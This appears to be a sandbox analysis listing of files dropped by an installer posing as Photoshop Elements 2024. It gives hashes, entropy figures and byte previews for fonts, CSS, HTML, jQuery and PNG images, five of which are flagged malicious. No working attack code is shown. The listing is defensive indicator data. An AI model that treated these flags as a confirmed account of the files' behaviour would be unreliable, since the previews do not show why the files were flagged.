                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:Web Open Font Format, TrueType, length 31112, version 1.0
                                                                                                      Category:dropped
                                                                                                      Size (bytes):31112
                                                                                                      Entropy (8bit):7.984152889259412
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:4ol18SuOO3bBAughXjNPQsXVjWuu7jqWdTS2gS:Lr6tAugVjN4sXJYjqWdm2V
                                                                                                      MD5:6AF297E58EDC414EE90C76C2D3EA8678
                                                                                                      SHA1:7497D181CD6FE3A4B01A4F8B6BA6A47D3FA54333
                                                                                                      SHA-256:3E8F59DB6DFAE287AF8DCCC0FDF5E15A8AA2A954C2C232BC6C64536E1A27EAA5
                                                                                                      SHA-512:61E14F8E605C4D2B52C9A874F40E73FDE43625BC468BA3C7316E7672CFFD05B7C1766C875FC1B48218BD2B6856226645EE9BCB45810EB7121C5DBD0C184B7D0A
                                                                                                      Malicious:false
                                                                                                      Preview:wOFF......y................................BASE.......J....c`[.FFTM............[...GDEF.......#...&....OS/2.......X...`j..#cmap...d.........B.cvt .......V...V.}..fpgm...@.......e../.gasp................glyf......k4.....8.head..q4...2...6..Cohhea..qh... ...$.r.hhmtx..q....Y.....6P.loca..s..........c..maxp..u.... ... ....name..u....(...2.JI.post..v..........k.prep..x.........:.&cx.c`d``..b..>........<...7............l....<...6..`d`...a`....d...z.....x.c```d....6...'{..@.J.b%...x.c`d``..b9..`.BF..@...%....c..+O...x.c`a~.8.......,...,..t.!.).Hs.23..01.$00..............o....w00..d.P``...c......\..y..x.c```f.`..F..8..1..,..........P..1............).9.%.5.}.+.x.5.J..~........1...AA@ABA.............._..........p.......~.......4?0..H.).S.....l.p.L@..]..,.l...\.<.|...B.".b...R.2.r...J.*.j...Z.:.z...F.&.f...V.6.v...N...n...^.>.~...A.!.a...Q.1.q....m..g.[.h...W.^.f..u.6n.e..{v...P...y.baA...,..Y......`...0.....b...Kjj.~...k.n_..........>{.Py..CKOsoW...}S.1L.3w6..c.@MU@.../.>...
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):189
                                                                                                      Entropy (8bit):4.841995719284234
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:5RFKqvZKSYRvsDQR7C8jOIbQvLwKEUc3XKRCRNKLUDfFLKYgEQmXt:PJ9MsfIsvMfHHKRkNlZLKYgE7t
                                                                                                      MD5:3A0EC2D2C5020A3CF45C13A87434B285
                                                                                                      SHA1:12275D4D51DE801CE28C88A0C246DE22C6D08120
                                                                                                      SHA-256:406288E48CED388744E5165A1EC4266F419CC409E4A70036E4B15A93AF5C42AB
                                                                                                      SHA-512:A7C6D55F64D91E5D71661E040F4D06D2C873E0B2D2A3B2E52FF60D230A7C7C0924CD0DDC4DC124D53736C934023A27D6ED77C1266732F0B5DE5DC75B02715C8B
                                                                                                      Malicious:false
                                                                                                      Preview:@charset "utf-8";..@font-face {...font-family: 'AdobeClean';...src: url('fonts/adobeclean/adobeclean-regular-webfont.woff') format('woff');...font-weight: normal;...font-style: normal;..}..
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:PNG image data, 445 x 239, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):218501
                                                                                                      Entropy (8bit):7.994177806609243
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:6144:IF6yyknzdRSTey+E4xlziCaENqYYRPuL1hGQ/uve:q6dkzdRzyfUlOZENXYJ2jGve
                                                                                                      MD5:70155993A908DD3F179030722111DAFD
                                                                                                      SHA1:7F77A6DA3295559977185127DF0131DFEAAB6401
                                                                                                      SHA-256:CE3DB74C58B62C946144D90E1B98982846BFDBA928F3832EFF5DFB0800BD14DD
                                                                                                      SHA-512:F4F84A88984EA656A13AD7D2F171688910528692E4CDEA2128C01EAAEE1E342AED9CD381162B888634083B38B36D34EEA31AF05E8BA0790570FB26125E6926EE
                                                                                                      Malicious:true
                                                                                                      Preview:.PNG........IHDR.............f.......pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c001 79.c0204b2def, 2023/02/02-12:14:24 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 24.5 (Macintosh)" xmp:CreateDate="2023-06-08T09:40:25-07:00" xmp:ModifyDate="2023-06-08T09:43:43-07:00" xmp:MetadataDate="2023-06-08T09:43:43-07:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:9cd1a8a5-fa0f-4664-954e-671adbe841c1" xmpMM:DocumentID="adobe:docid:photoshop:33d3baaf-635d-744b-8709-2bf9163d9686" xmpMM:OriginalDocumentID="xmp.did:f
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:PNG image data, 445 x 239, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):196538
                                                                                                      Entropy (8bit):7.994396839674714
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:3072:CnSlcookIH/9pdgUmvcFsGE4WywNB2DuN/7/r+Hh44JJwN+xMAr/Goh2qMdi3Add:EDo3ctFsR/Ht7KBRTiAr/GDVH7qfpgJb
                                                                                                      MD5:ECBDD07F272A819936179371478A8C3F
                                                                                                      SHA1:FF77202067ACB0463E7878C44004CF55549325C1
                                                                                                      SHA-256:D370C16BDA414ECEED68A3432A1C2EBD37E3E84151E667CA5FCC2DA1A6876305
                                                                                                      SHA-512:1B9FBD76C08CDAD927583F80FE5854EBFF55741805ADE093071A4BEEF0887DEF2CB456AD1B996CE110DD45F9E1B329457833BFF4DA0D391E0E7770D0FF119D21
                                                                                                      Malicious:true
                                                                                                      Preview:.PNG........IHDR.............f.......pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c001 79.c0204b2def, 2023/02/02-12:14:24 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 24.5 (Macintosh)" xmp:CreateDate="2023-06-08T09:40:26-07:00" xmp:ModifyDate="2023-06-08T09:43:44-07:00" xmp:MetadataDate="2023-06-08T09:43:44-07:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:4879ee18-af3c-48f2-a799-f0d2eb0add0b" xmpMM:DocumentID="adobe:docid:photoshop:63b35f9e-9203-bb4d-9b26-ed4aa5736dba" xmpMM:OriginalDocumentID="xmp.did:e
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:PNG image data, 445 x 239, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):149774
                                                                                                      Entropy (8bit):7.991574130023794
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:3072:55ne4y2rhCF9yOm7QMflNGiYb+s9N5FsUA5FLOI70degQa:Pn3rkF27Q6Sbp0PLOI7GR
                                                                                                      MD5:6FC7D9D817DECC0ECA1F54C1540DA1A0
                                                                                                      SHA1:01959A4664CF3EA64A9CC85E6F8F60B25698107B
                                                                                                      SHA-256:9426BB5B0A9E4524C05C861781A8599646B83B0572F548A065C0EC6B791B016D
                                                                                                      SHA-512:1C492B0926915206A4A233FC1F00F3A5DF21AF7C957F00573BC7780E42A3AFAA444002B9420C31A6AC65C89B4B72DD26E6F640302F8C8240592AB5CA3636FC39
                                                                                                      Malicious:true
                                                                                                      Preview:.PNG........IHDR.............f.......pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c001 79.c0204b2def, 2023/02/02-12:14:24 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 24.5 (Macintosh)" xmp:CreateDate="2023-06-08T09:40:25-07:00" xmp:ModifyDate="2023-06-08T09:43:45-07:00" xmp:MetadataDate="2023-06-08T09:43:45-07:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:ecb4903c-3b3e-489c-8b36-4bd9573232de" xmpMM:DocumentID="adobe:docid:photoshop:32c69ae6-f6d6-d24d-96bd-887f72b4446c" xmpMM:OriginalDocumentID="xmp.did:5
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:PNG image data, 445 x 239, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):190441
                                                                                                      Entropy (8bit):7.9969327976436695
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:3072:/FkChxBSQXzJ6QT8bCMw8zYi2qgI4rD/lkX4uVToHq2H263TtV+kPbhKztvyKCy:9kCnBS4zaZdbfX4POX4u1oHqgLP+kPOp
                                                                                                      MD5:448941A2F024056569EF9817EEFEB9A7
                                                                                                      SHA1:544EC13242A4B9BD3E0A4D65079C55DF006D6D24
                                                                                                      SHA-256:21EFD9F1038B0D96E1D14A54E2A57F0EA407149F4C522CF23B617932F7336743
                                                                                                      SHA-512:1CE6C24D06CA13F200C7F856887F644C61AFC2DFD5C25C35197002DF4CD519A7EB98C253A6DCFC05017CD60A7DFFBFD4489DC8C068F6E4638BE546B7BEC0BB62
                                                                                                      Malicious:true
                                                                                                      Preview:.PNG........IHDR.............f.......pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c001 79.c0204b2def, 2023/02/02-12:14:24 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 24.5 (Macintosh)" xmp:CreateDate="2023-06-08T09:40:25-07:00" xmp:ModifyDate="2023-06-08T09:43:46-07:00" xmp:MetadataDate="2023-06-08T09:43:46-07:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:3f70fe00-776c-4639-9501-80a213adaf5c" xmpMM:DocumentID="adobe:docid:photoshop:403eff47-3e40-d943-b1f3-cd79be874dc9" xmpMM:OriginalDocumentID="xmp.did:6
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:PNG image data, 445 x 239, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):222420
                                                                                                      Entropy (8bit):7.994042748653122
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:6144:jcz9b7RCO9pmE6Ko+87V5lIjrYR3XrwPaQOtI:jcz9nRChwQ55lAosPaptI
                                                                                                      MD5:D428286039502448A467942D6F20772E
                                                                                                      SHA1:412C3EA49EC6BC7EB0C52D778BC4E95E33201D88
                                                                                                      SHA-256:61DA52D1E93196300E6E2DD189CB3F5BD5389A42CEA0903139E4D2F475CB6B2E
                                                                                                      SHA-512:0022EB09B113D0B5B584B08458A1D2FB6381758CC94675D98F3EB118D48B4B4444477371D5C9D82C89F8027874D8B70F533327716E27E2395FCF19E8F102EDA4
                                                                                                      Malicious:true
                                                                                                      Preview:.PNG........IHDR.............f.......pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c001 79.c0204b2def, 2023/02/02-12:14:24 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 24.5 (Macintosh)" xmp:CreateDate="2023-06-08T09:40:25-07:00" xmp:ModifyDate="2023-06-08T09:43:47-07:00" xmp:MetadataDate="2023-06-08T09:43:47-07:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:7ac500a4-b904-4744-8465-5d68e86d59d2" xmpMM:DocumentID="adobe:docid:photoshop:a720b7d4-b284-e144-a70b-eee0bf83c698" xmpMM:OriginalDocumentID="xmp.did:4
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:PNG image data, 890 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):553301
                                                                                                      Entropy (8bit):7.995654160787874
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:12288:epoqx1wWl8qxmvXfTrc+toMT06H+rI6k2S+LmWJXEUon:Ooqx1kqGX/DLXzhEmG0Vn
                                                                                                      MD5:3ED1397092BD3EAFDFE71335BF5F5E3C
                                                                                                      SHA1:9D1DBE45E4F1F12A0642EED50F91FDC8DA3B888A
                                                                                                      SHA-256:8276F8BE890ABEEC09B6AAB522F7B45F60ABE2BFA51FEC333924537BABF9D9E3
                                                                                                      SHA-512:5DBE0A094498615CD944F7A16888E4603DC357779A9CA8D8DDEBDCF8AD8C72106EFFD316E3078037EBF254245D2C25BEA5A3ADFE773CCB783090206EE9D75A78
                                                                                                      Malicious:true
                                                                                                      Preview:.PNG........IHDR...z..........Ay.....sBIT....|.d... .IDATx^...dWy..U.'.(."(#....H(..&K...0a...m..,^.X..Y2.......QB $!..(.Q...=.9W......)uuu....s...U..{.{..~.$.......@@ ...........@@ ...3.$..3}.............@@ ........@..@.........@@ ........s..@..X..........@@ ..........@............@@ ........s..@..X..........@@ ..........@............@@ ........s..@..X..........@@ ..........@............@@ ........s..@..X..........@@ ..........@............@@ ........s..@..X..........@@ ..........@............@@ ........s..@..X..........@@ ..........@............@@ ........s..@..X..........@@ ..........@............@@ ........s..@..X..........@@ ..........@............@@ ........s..@..X..........@@ ..........@............@@ ........s..@..X..........@@ ..........@............@@ ........s..@..X..........@@ ..........@............@@ ........s..]N......04' ..............@"....Z.......D......^.i.r@ ..........9.@5bW..9.FhL@`/A`........_h###V($..LX"..d2.....g..Y...($-...`9
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (484), with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4509
                                                                                                      Entropy (8bit):5.497933185923274
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:hSq8uLYbW1sfMUKJpmtqunn4TJPxqfR7vzf:sX+QQaym6CZ7
                                                                                                      MD5:348352BAA22F54466691B8673B6B6C93
                                                                                                      SHA1:5F6606EA02606FEC542690E80273AA5FFAAFF0AE
                                                                                                      SHA-256:39E5810ACB9489EDF3918ADB3746255866975AFC1F6AB65FFC2BA598C505D2B1
                                                                                                      SHA-512:F2749AE136CA182DF2D0FE31DDED8069D8AD915AA8BEEC02871A675BE8F0666042B5E91F4DB39F751A4AECB240DCDB1A23377EB4107EA77FB5B0A478090135D3
                                                                                                      Malicious:false
                                                                                                      Preview:<!DOCTYPE html>..<html>..<head>...<meta charset="UTF-8">..<title>PSE installer slideshow</title>..<meta name="viewport" content="width=device-width, initial-scale=1">...<link href="https://use.typekit.net/af/c2b3ac/0000000000000000000176ff/27/l?unicode=AAAIKgAAAAeBbOxmgCK-MdR34PEMRZ1Tp9CwbKr4ekaVGobt7iigFXgNffcWrPD_gJGcqz4xm1ZHNxQko2H768-q_TQrRlbWnqbTqCadCnzX6SMLdOBM8TwhjODtXWG7u6eXofuwSXdUrzPUKbfKpbP6PlW4uDR0-6_uxx_z2oPZb3FtGAlPVL4uieBXWVbsZ4asc6c4x6xRdBebJFZn5j3znnW2M2LSxdS-vENrhYjQcGpEJr10KhGz9SJjgjddqPchFHp-i9IDPTig_GvFioJvHs2SJsCuNUs-qApsimZXK9dDrVIGetZ_W6VrfDwKAGEfm-zn0HbNFllfrTmy7jrTddn22c9_90qThgAAAE4&features=ALL&v=3" rel="stylesheet">...<link rel="stylesheet" href="css/styles.css">......<style>.....html {....background-color: #fff;.....}..* {box-sizing: border-box;}..body {...margin:0px;}...mySlides {opacity: 0; position: absolute; transition: all 1s;}..img {vertical-align: middle;}..../* Slideshow container */...slideshow-container {.. max-width: 445px;.. position: relativ
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:ASCII text, with very long lines (65482), with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):93637
                                                                                                      Entropy (8bit):5.292996107428883
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:96IzxETpavYSGaW4snuHEk/yosnSFngC/VEEG0vd0KO4emAp2LSEMBoviR+I1z5T:v+vIklosn/BLXjxzMhsSQ
                                                                                                      MD5:E1288116312E4728F98923C79B034B67
                                                                                                      SHA1:8B6BABFF47B8A9793F37036FD1B1A3AD41D38423
                                                                                                      SHA-256:BA6EDA7945AB8D7E57B34CC5A3DD292FA2E4C60A5CED79236ECF1A9E0F0C2D32
                                                                                                      SHA-512:BF28A9A446E50639A9592D7651F89511FC4E583E213F20A0DFF3A44E1A7D73CEEFDB6597DB121C7742BDE92410A27D83D92E2E86466858A19803E72A168E5656
                                                                                                      Malicious:false
                                                                                                      Preview:/*! jQuery v1.8.3 jquery.com | jquery.org/license */..(function(e,t){function _(e){var t=M[e]={};return v.each(e.split(y),function(e,n){t[n]=!0}),t}function H(e,n,r){if(r===t&&e.nodeType===1){var i="data-"+n.replace(P,"-$1").toLowerCase();r=e.getAttribute(i);if(typeof r=="string"){try{r=r==="true"?!0:r==="false"?!1:r==="null"?null:+r+""===r?+r:D.test(r)?v.parseJSON(r):r}catch(s){}v.data(e,n,r)}else r=t}return r}function B(e){var t;for(t in e){if(t==="data"&&v.isEmptyObject(e[t]))continue;if(t!=="toJSON")return!1}return!0}function et(){return!1}function tt(){return!0}function ut(e){return!e||!e.parentNode||e.parentNode.nodeType===11}function at(e,t){do e=e[t];while(e&&e.nodeType!==1);return e}function ft(e,t,n){t=t||0;if(v.isFunction(t))return v.grep(e,function(e,r){var i=!!t.call(e,r,e);return i===n});if(t.nodeType)return v.grep(e,function(e,r){return e===t===n});if(typeof t=="string"){var r=v.grep(e,function(e){return e.nodeType===1});if(it.test(t))return v.filter(t,r,!n);t=v.filter(t
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:ASCII text, with very long lines (63595), with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):718997
                                                                                                      Entropy (8bit):6.0071312142972335
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:P5i6jE/5acgsu0wwT63kaSROcdOLeK+CnLG1VWzWhHuakxiaHbr3Gq5XR1:ho/5F5N65SROcwLeKVggzWItBP3/5XH
                                                                                                      MD5:4F3364AF3E396F92A8826532BFB1A7E5
                                                                                                      SHA1:7F7B613435ECE78A358F2066287C2F2C3C6AA168
                                                                                                      SHA-256:45B9B77499356527E9047256DB96A542A720BF075D67E9F6BA55D51FD562339E
                                                                                                      SHA-512:C022A28656483106095967EC4D57EB743D04F029406C2C553C9D19C103520E274C0EEA19F411BDB7AE16F388211C456A413DF5A0A6097036DEB0010573D49C72
                                                                                                      Malicious:false
                                                                                                      Preview:/*************************************************************************.. * ADOBE CONFIDENTIAL.. * ___________________.. *.. * Copyright 2015 Adobe Systems Incorporated.. * All Rights Reserved... *.. * NOTICE: All information contained herein is, and remains.. * the property of Adobe Systems Incorporated and its suppliers,.. * if any. The intellectual and technical concepts contained.. * herein are proprietary to Adobe Systems Incorporated and its.. * suppliers and are protected by all applicable intellectual property.. * laws, including trade secret and copyright laws... * Dissemination of this information or reproduction of this material.. * is strictly forbidden unless prior written permission is obtained.. * from Adobe Systems Incorporated... **************************************************************************/.. ../*{"c":"2014-07-16T23:34:26Z","s":"prod-origin-83c205ec","v":"783743"}*/../*.. * The Typekit service used to deliver this font or fonts for use on websites.
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2578
                                                                                                      Entropy (8bit):4.931529716406852
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:NSrnTHOeL3SJr9DlBPd3i0HcxP4Kevtwsx0uB7Vc3KA:NSrnL3ArdlBd3i0Hc+53B5c/
                                                                                                      MD5:1265D497504870D225452B3309B0E06B
                                                                                                      SHA1:29A3B783E6F2F2CD3F6D08833B83C7848F8E3450
                                                                                                      SHA-256:4273A5D4EF990DEAD6CABE760C27B25F7FCF8A51177F1B31813AD8866A565330
                                                                                                      SHA-512:9AA8B24E800A619651699C193A7747B8673A3CD4F8A5D3B16EE35F5EF6161F953A904631B97D118339332A3D2C7292C910802F6E1518DB18D48FAB5E9EB91681
                                                                                                      Malicious:false
                                                                                                      Preview:/*jQuery's custom scrollbar*/.....scrollable {.. position: relative;..}.....scrollable:focus {.. outline: 0;..}.....scrollable .viewport {.. position: relative;.. overflow: hidden;..}.....scrollable .viewport .overview {.. position: relative;..}.....scrollable .scroll-bar {.. display: none;..}.....scrollable .scroll-bar.vertical {.. position: absolute;.. right: 0;.. height: 100%;..}.....scrollable .scroll-bar.horizontal {.. position: relative;.. width: 100%;..}.....scrollable .scroll-bar .thumb {.. position: absolute;..}.....scrollable .scroll-bar.vertical .thumb {.. width: 100%;.. min-height: 10px;.. min-height: 0.625rem;..}.....scrollable .scroll-bar.horizontal .thumb {.. height: 100%;.. min-width: 10px;.. min-width: 0.625rem;.. left: 0;..}.....not-selectable {.. -webkit-touch-callout: none;.. -webkit-user-select: none;.. -khtml-user-select: none;.. -moz-user-select: none;.. -ms-user-select: none;.. user-selec
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2632
                                                                                                      Entropy (8bit):5.126236676088857
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:3m3bY/eZDzd6rd0DVA9I5QV9OuE/KXjtkQnYX5wJp8EBEPiDpoQ6WLEIp6Yhn2oY:30bX1dT5QbXjRnZJp5ePcUWLEIUYV7/A
                                                                                                      MD5:D98F70FFD105672292755A37F173C2EC
                                                                                                      SHA1:C0154ADD295AC052F234A0282A62B704CDD01998
                                                                                                      SHA-256:257A42F797F140667C81930001E73943BFC243D50BCC775F75D0334A2D2CF2C3
                                                                                                      SHA-512:1909CC7E4DA0949A469852240BE2205209968B18B99F7D967BC0231DE33D03C7CBAA9578972E30E95E6D7017AEBF9CD70A55BA22CDC9D5774D2A237D3EB0971B
                                                                                                      Malicious:false
                                                                                                      Preview:/**.. * Created by puarora on 05/10/2017... */....function attachEvt(elem, eventName, handler) {.. if (document.attachEvent) elem.attachEvent('on' + eventName, handler);.. else elem.addEventListener(eventName, handler);..}....function wrap(el, wrapper) {.. wrapper.setAttribute("class", "custom-checkbox");.. el.parentNode.insertBefore(wrapper, el);.. wrapper.appendChild(el);..}....function addClass(ele, cls) {.. if (!hasClass(ele, cls)) ele.className += " " + cls;..}....function removeClass(ele, cls) {.. if (hasClass(ele, cls)) {.. var reg = new RegExp('(\\s|^)' + cls + '(\\s|$)');.. ele.className = ele.className.replace(reg, ' ');.. }..}....function toggleClass(element, cssClass) {.. var classes = element.className.match(/\S+/g) || [],.. index = classes.indexOf(cssClass);.. index >= 0 ? classes.splice(index, 1) : classes.push(cssClass);.. element.className = classes.join(' ');..}....function hasClass(target, className) {.. return
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:assembler source, ASCII text, with very long lines (576), with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):17365
                                                                                                      Entropy (8bit):4.939377811069116
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:A4tVyLcF4YlTAIjroXJBYCd+WQ3boESgXimdzYSea415+ppxwRkWf0h:XtVyE4YCZB/cUPrsp7
                                                                                                      MD5:EDACDE36FF06BD26F1907AE092EAC998
                                                                                                      SHA1:C25E9052EE5B28EC28E2ECEEE40217302BF2CAAE
                                                                                                      SHA-256:257634B6FA84DCE998B31D6497330F0A0661EFBD270F58289FBE026ED95B6F2C
                                                                                                      SHA-512:7E8D48E71A51659EA52DCCC2D7C542580C9EA1953EC9CA2AD77D3C0926C5BC77167F85121FAB2DCB7FD4D6D2F04EDBD90815B76979D3269994CF662FADC357E1
                                                                                                      Malicious:false
                                                                                                      Preview:body {.. line-height: normal;.. font-family: 'Adobe Clean', sans-serif;.. margin: 0;.. -webkit-user-select: none;.. -moz-user-select: none;.. -ms-user-select: none;.. user-select: none;..}.....text-center {.. text-align: center;..}.....cec-carousel{...border: none;...position: fixed;..}.....centerMid {.. padding-top: 88px;.. padding-top: 5.5rem;..}.....content {.. height: 345px;...height: 21.5625rem;.. color: #4b4b4b;.. background: #f5f5f5;.. position: relative;..}.....content .centerMid {.. height: 181px;...height: 11.31rem;..}.....content img {.... margin-bottom: 22px;.. margin-bottom: 1.375rem;.. width: 88px;...width: 5.5rem;.. height: 84px;.. height: 5.25rem;..}.....content .productName {.. font-size: 29px;...font-size: 1.812rem;.. font-weight: lighter;.. word-wrap: break-word;.. padding-left: 20px;.. padding-right: 20px;..}.....downloaderContent .packageName {.. font-size: 29px;.. font-size: 1.812rem;
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):7111
                                                                                                      Entropy (8bit):4.185691978778471
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:pSEvOm69itmXEv9YqS0WsYSZt/38WMc3pGh1x+Flxtfz:oBitmXevlEWMcO1x+FlxtL
                                                                                                      MD5:60E80C05A9D6AA602626FEC33CD99E3C
                                                                                                      SHA1:7AEAAC92D57FBABE5DA2C923EB0AD1BB22E647AB
                                                                                                      SHA-256:5BD6A4BC514B2E697A0F0E8B7B8C0BE0AF34A9E1C25A628B286A5CDF8E1837D3
                                                                                                      SHA-512:838DE7045B1EE4542D4145276B3FEF5BA60DC10ED0066266BEBB3E44C5485005D33DCEAEFB1CF3FD1FD1BC7364622BB85630957A243464C4C738A415B30ADF7F
                                                                                                      Malicious:false
